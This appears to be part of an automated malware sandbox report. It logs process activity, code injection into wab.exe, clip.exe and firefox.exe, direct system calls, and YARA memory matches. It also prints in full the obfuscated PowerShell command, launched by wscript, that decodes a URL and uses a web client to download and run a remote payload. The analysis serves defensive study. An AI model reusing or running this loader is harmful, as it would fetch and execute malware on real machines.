          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438C730 mov eax, dword ptr fs:[00000030h]22_2_0438C730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431973A mov eax, dword ptr fs:[00000030h]22_2_0431973A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431973A mov eax, dword ptr fs:[00000030h]22_2_0431973A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04313720 mov eax, dword ptr fs:[00000030h]22_2_04313720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F720 mov eax, dword ptr fs:[00000030h]22_2_0432F720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F720 mov eax, dword ptr fs:[00000030h]22_2_0432F720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F720 mov eax, dword ptr fs:[00000030h]22_2_0432F720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF72E mov eax, dword ptr fs:[00000030h]22_2_043CF72E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C720 mov eax, dword ptr fs:[00000030h]22_2_0434C720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C720 mov eax, dword ptr fs:[00000030h]22_2_0434C720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D972B mov eax, dword ptr fs:[00000030h]22_2_043D972B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04310710 mov eax, dword ptr fs:[00000030h]22_2_04310710
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04340710 mov eax, dword ptr fs:[00000030h]22_2_04340710
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434F71F mov eax, dword ptr fs:[00000030h]22_2_0434F71F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434F71F mov eax, dword ptr fs:[00000030h]22_2_0434F71F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04317703 mov eax, dword ptr fs:[00000030h]22_2_04317703
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04315702 mov eax, dword ptr fs:[00000030h]22_2_04315702
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04315702 mov eax, dword ptr fs:[00000030h]22_2_04315702
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C700 mov eax, dword ptr fs:[00000030h]22_2_0434C700
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04318770 mov eax, dword ptr fs:[00000030h]22_2_04318770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04320770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430B765 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04310750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0439E75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04394755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04323740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E3749 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0434674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0434674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433D7B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E37B6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430F7BA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043997A9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0439F7AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043107AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043CF78A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043147FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0431D7E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0439E7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043327ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0431C7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043157C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043907C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D903E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430A020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430C020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432E016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04394000 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433C073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04321070 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04321070 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0438D070 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0439106E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E5060 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04312050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433B052 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043B705E mov ebx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043B705E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04396050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D60B8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D60B8 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043A80A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433D090 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04315096 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0434909C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0439D080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0431208A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430D08D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430C0F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043520F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430A0E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043350E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043350E4 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043180E9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043960E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043920DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E50D9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043390DB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043270C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043270C0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0438D0C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04311131 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430B136 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04340124 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043BA118 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043BA118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D0115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430F172 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043A9179 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043A8158 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04317152 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04316154 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430C156 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E5152 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04309148 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043A4144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043A4144 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432B1B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043C11A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0439019F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04367190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430A197 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04350185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043CC188 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043B71F9 mov esi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043401F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E61E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043151ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0434D1D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0434D1D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0438E1D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0438E1D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E51CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D61C3 mov eax, dword ptr fs:[00000030h]

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: amsi64_6600.amsi.csv, type: OTHER
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6600, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtMapViewOfSection: Direct from: 0x77762D1C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtCreateMutant: Direct from: 0x777635CC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtResumeThread: Direct from: 0x777636AC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtReadFile: Direct from: 0x77762ADC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtDelayExecution: Direct from: 0x77762DDC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtQueryInformationProcess: Direct from: 0x77762C26
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtResumeThread: Direct from: 0x77762FBC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtCreateUserProcess: Direct from: 0x7776371C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtSetInformationThread: Direct from: 0x777563F9
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtSetInformationThread: Direct from: 0x77762B4C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtClose: Direct from: 0x77762B6C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtCreateKey: Direct from: 0x77762C6C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtQuerySystemInformation: Direct from: 0x777648CC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtOpenSection: Direct from: 0x77762E0C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtQueryInformationToken: Direct from: 0x77762CAC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtTerminateThread: Direct from: 0x77762FCC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtCreateFile: Direct from: 0x77762FEC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtOpenFile: Direct from: 0x77762DCC
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtOpenKeyEx: Direct from: 0x77762B9C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtSetInformationProcess: Direct from: 0x77762C5C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe protection: execute and read and write
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe protection: read write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: 2156
          Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C00000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 292FA7C
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
